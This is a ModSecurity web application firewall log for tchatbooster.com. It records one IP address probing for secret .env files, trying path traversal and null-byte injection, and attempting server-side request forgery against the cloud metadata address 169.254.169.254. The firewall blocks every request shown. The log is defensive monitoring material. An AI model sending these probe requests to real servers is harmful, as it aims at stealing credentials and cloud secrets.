[Tue May 12 04:39:12.172155 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.166:57038] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKS0BfeipD4uoG21FoiiQAAAAA"]
[Tue May 12 04:39:12.172845 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.166:57038] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKS0BfeipD4uoG21FoiiQAAAAA"]
[Tue May 12 04:39:12.469778 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSztr1yOh9TvizeziPuQAAAEs"]
[Tue May 12 04:39:12.558943 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.166:57142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKS0AgpmE1yW0glLdgfHgAAANg"], referer: https://tchatbooster.com/.env.staging
[Tue May 12 04:39:12.559168 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.166:57142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKS0AgpmE1yW0glLdgfHgAAANg"], referer: https://tchatbooster.com/.env.staging
[Tue May 12 04:39:12.577340 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:57062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSzRfeipD4uoG21FoigwAAAAc"]
[Tue May 12 04:39:12.609635 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.166:50524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSzDue9Sp-pIv_Bb61IQAAAUA"]
[Tue May 12 04:39:13.073663 2026] [security2:error] [pid 1825287:tid 1825318] [client 45.148.10.166:57100] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS0QgpmE1yW0glLdgfHwAAAM0"], referer: https://tchatbooster.com/static../../.env.local
[Tue May 12 04:39:13.073845 2026] [security2:error] [pid 1825287:tid 1825318] [client 45.148.10.166:57100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS0QgpmE1yW0glLdgfHwAAAM0"], referer: https://tchatbooster.com/static../../.env.local
[Tue May 12 04:39:13.107816 2026] [security2:error] [pid 1820198:tid 1820224] [client 45.148.10.166:57076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSzc1tk6y7yBJLpJopiwAAAJg"]
[Tue May 12 04:39:13.127623 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:13.127677 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:13.127703 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:13.127737 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:13.127956 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:13.127999 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:13.128483 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 26)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:14.515195 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:57162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS0jue9Sp-pIv_Bb61NAAAAU8"]
[Tue May 12 04:39:14.515282 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:57162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS0jue9Sp-pIv_Bb61NAAAAU8"]
[Tue May 12 04:39:14.515470 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:57162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS0jue9Sp-pIv_Bb61NAAAAU8"]
[Tue May 12 04:39:14.554383 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.166:57038] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0BfeipD4uoG21FoiiQAAAAA"]
[Tue May 12 04:39:14.667295 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKS0s1tk6y7yBJLpJopmwAAAII"], referer: https://tchatbooster.com/_next/image/?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F&w=1200&q=75
[Tue May 12 04:39:14.668046 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKS0s1tk6y7yBJLpJopmwAAAII"], referer: https://tchatbooster.com/_next/image/?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F&w=1200&q=75
[Tue May 12 04:39:15.107738 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0wgpmE1yW0glLdgfJwAAAMw"]
[Tue May 12 04:39:15.107800 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0wgpmE1yW0glLdgfJwAAAMw"]
[Tue May 12 04:39:15.107829 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0wgpmE1yW0glLdgfJwAAAMw"]
[Tue May 12 04:39:15.108517 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS0wgpmE1yW0glLdgfJwAAAMw"]
[Tue May 12 04:39:15.214129 2026] [security2:error] [pid 1825287:tid 1825318] [client 45.148.10.166:57100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0QgpmE1yW0glLdgfHwAAAM0"], referer: https://tchatbooster.com/static../../.env.local
[Tue May 12 04:39:15.731200 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS09r1yOh9TvizeziPzAAAAEs"]
[Tue May 12 04:39:15.731389 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS09r1yOh9TvizeziPzAAAAEs"]
[Tue May 12 04:39:15.802350 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.166:57142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0AgpmE1yW0glLdgfHgAAANg"], referer: https://tchatbooster.com/.env.staging
[Tue May 12 04:39:16.260334 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.166:57148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 26 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0c1tk6y7yBJLpJopkwAAAIQ"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:16.320362 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:57162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0jue9Sp-pIv_Bb61NAAAAU8"]
[Tue May 12 04:39:16.801162 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS1AgpmE1yW0glLdgfKQAAAMI"], referer: https://tchatbooster.com/static../../.env.production
[Tue May 12 04:39:16.801430 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS1AgpmE1yW0glLdgfKQAAAMI"], referer: https://tchatbooster.com/static../../.env.production
[Tue May 12 04:39:16.854936 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0wgpmE1yW0glLdgfJwAAAMw"]
[Tue May 12 04:39:16.911492 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS0s1tk6y7yBJLpJopmwAAAII"], referer: https://tchatbooster.com/_next/image/?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F&w=1200&q=75
